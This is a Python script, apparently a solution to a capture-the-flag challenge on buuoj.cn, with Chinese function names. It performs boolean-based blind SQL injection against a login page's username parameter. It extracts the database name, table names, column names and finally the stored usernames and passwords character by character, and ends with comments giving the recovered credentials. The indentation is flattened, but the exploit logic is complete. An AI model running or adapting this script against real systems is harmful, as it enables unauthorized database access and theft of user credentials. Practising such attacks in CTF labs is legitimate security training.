from requests import get #用于向服务器发送请求
from urllib.parse import quote,unquote
from time import sleep
ascii='1234567890qwertyuioplkjhgfdsazxcvbnm-_,'
def 当前数据库名称长度():
for i in range(50):
payload=f"1' or (select length(database()))={i} -- +"
payload=quote(payload)
url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
if 'flag' in res:
#print(unquote(payload)) 1' or (select length(database()))=4 -- +
return i
def 当前数据库名称():
STR=''
for ix in range(当前数据库名称长度()+1):
for i in ascii:
payload=f"1' or (select substr(database(),{ix},1))='{i}' -- +"
payload=quote(payload)
url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
if 'flag' in res:
STR+=i
break
return STR #geek
def 所有表名称的长度():
for i in range(50):
payload=f"1' or (select length(group_concat(table_name)) from information_schema.tables where table_schema='geek')={i} -- +"
payload=quote(payload)
url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
if 'flag' in res:
#print(unquote(payload)) #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
return i
def 所有表名称():
STR=''
for ix in range(1,9):
for i in ascii:
payload=f"1' or (select substr(table_name,{ix},1) from information_schema.tables where table_schema='geek')='{i}' -- +"
payload=quote(payload)
url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
if 'flag' in res:
STR+=i
break
return STR #geekuser
def 所有字段名长度():
for i in range(50):
payload=f"1' or (select length(group_concat(column_name)) from information_schema.columns where table_schema='geek' and table_name='geekuser')={i} -- +"
payload=quote(payload)
url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
if 'flag' in res:
#print(unquote(payload)) #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
return i
def 所有字段(): #id,usernam,swd
STR=''
for ix in range(21):
for i in ascii:
payload=f"1' or (select substr(group_concat(column_name),{ix},1) from information_schema.columns where table_schema='geek' and table_name='geekuser')='{i}' -- +"
payload=quote(payload)
url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
sleep(0.1)
if 'flag' in res:
#print(unquote(payload))
STR+=i
break
return STR
def 字段内容长度():
for i in range(1000):
payload=f"1' or (select length(group_concat(username,password)) from geekuser)={i} limit 0,1-- +"
payload=quote(payload)
url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
print(unquote(payload))
if 'flag' in res:
#print(unquote(payload)) #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
return i
def 字段内容username():
STR=''
for ix in range(148):
for i in ascii:
payload=f"1' or (select substr(group_concat(username),{ix},1) from geekuser)='{i}' -- +"
payload=quote(payload)
url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
sleep(0.1)
if 'flag' in res:
print(unquote(payload))
STR+=i
break
if ',' in STR:
return STR
def 字段内容password():
STR=''
for ix in range(148):
for i in ascii:
payload=f"1' or (select substr(group_concat(password),{ix},1) from geekuser)='{i}' -- +"
payload=quote(payload)
url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
res=get(url).text
sleep(0.1)
if 'flag' in res:
print(unquote(payload))
STR+=i
break
if ',' in STR:
return STR
print(字段内容username())
print(字段内容password())
#账号:in_fact
#密码:this_question_is_very_simple